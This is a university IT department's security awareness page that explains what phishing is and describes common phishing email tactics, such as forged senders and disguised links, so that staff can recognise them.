Medical University   |   MUSC Hospital  | Directory   |   MUSC A-Z
IS Desktop Security  

Home

Microsoft Endpoint Protection
Forefront 2012
Home/ Off Campus
Definition Updates
System Sweeper
Manual System Sweeper

Disable Autorun
NoAutorun Registry Key

ProtectMac Antivirus
Download Info
License Request

Windows Updates
WSUS Enroll

Laptop Encryption
Encryption Instructions (PC)
Encryption Instructions (Mac)

 
 

What is Phishing?

The term 'Phishing' (pronounced 'fishing') is used to describe a type of
cybercrime where spoofed e-mail or instant messages are used as 'bait', in
oder to 'lure' unsuspecting users into revealing personal information -
such as usernames and passwords, or credit card, banking or social
security numbers.

Scammers 'phish' for your personal information in a variety of ways. Most
commonly, they send fraudulent e-mails claiming to be from MUSC's IT
department, or your bank, or any other business, government agency, social
media website, or other organization that already has some of your
personal details. Typically, the e-mail asks you to confirm these details,
either by replying to the e-mail, or by clicking on a link that takes you
to a fake website. In some phishing attacks, the fake website may closely
mimic the look and feel of the real web site of the institution or
business that is being spoofed.

Once scammers have tricked you into giving them your information, they can
use it in a number of ways. If you have given them your MUSC NetID and
password, they can break into your MUSC account, and use it for various
criminal purposes. If you have given them your credit card info, they can
use it to make unauthorized purchases. If you have given them your banking
info, they can clean out your account and send the money overseas in a
matter of seconds. In some cases, they may simply gather your personal
information, and sell it to identity theft rings.

Phishing emails are commonly used in association with a fake web site that looks very similar to a real website from the relevant institution.

Phishing Email Methods


The initial phishing email is designed to entice the recipient to open the email and click on the link provided. The fraudsters use multiple methods to do this, including enticing subject lines, forging the address of the sender, using genuine looking images and text and disguising the links within the email.

1. Deceptive Subject Lines
Phishing emails tend to have subject lines that appear to be genuinely related to who the email is from, in an attempt to entice the user to open the email. For example, subject lines such as “Important notice for all Internet Banking Users”. It is also common for subject lines to carry numerals or other letters to replace characters, in an attempt to bypass SPAM filters, such as capital “ I ” replacing “ l ”. Some phishing emails will deliberately misspell key words to bypass SPAM filters, which most people would not recognize when quickly glancing at the subject line.

2. Forged Senders Address
The forging of the senders address is an easy deception method. There is no guarantee that the address listed as the senders address is genuine. Phishing scam emails will normally have a forged senders address appearing as though the email has come from the company it is claiming to be.


3. Genuine Looking Content
Phishing emails normally utilize copied images and text styles used on the legitimate web site to portray their email as genuine. Many consumers are fooled into thinking an email is genuine simply because it had the banks logo within the email. Some phishing emails also have genuine links to the company's privacy policy and other pages on the legitimate web site. Trusts and authentication marks are also duplicated to build the user's confidence in the authentication of the email.

4. Disguised Hyperlinks
Links within an email are deliberately disguised in another attempt to deceive the recipient. HTML emails may display a genuine URL but when clicked on the hyperlink will take the user to a different web site. For example: a link displayed as “http://www.genuine-site.com” may actually take the user to “http://www.fraud-site.com”

In text only emails, a long URL would be presented with and “@” before the actual web site. For example, a link may be displayed as

“http://www.genuine-site.com-Verify83kcmdj30dk>Secure32902ds;lkjasdfkljad@fraud-site.com”

This would take the user to http://www.fraud-site.com, as this is after the @ symbol. The link may look valid because it begins with the genuine site URL, and contains genuine looking words within the link.

5. Email Form
The email contains a form for the consumer to enter their personal information and click "submit", "send" or "update". Forms within emails utilize script located on a remote server to receive the information and either forward the information to the fraudsters, or place the information in a database for the fraudster to pick up later.

These methods are used by the more complex phishing emails. Some amateur phishing emails may contain poor spelling & grammar, no images and may not even attempt to disguise the URL.

 

 

 

 

 

 

 

Policies and Procedures
Computer Use Policy

Email Encryption
Instructions (web)
Instructions (.pdf)

Email Phishing
About Phishing
Recent Phishes at MUSC
Submit a Suspect Email

Secunia Patch Management
Windows

 

OCIO Information Services | 19 Hagood Avenue, Suite 201, MSC 801 | Charleston, SC 29425-8010
Phone: 843-792-4175 | Fax: 843-792-8319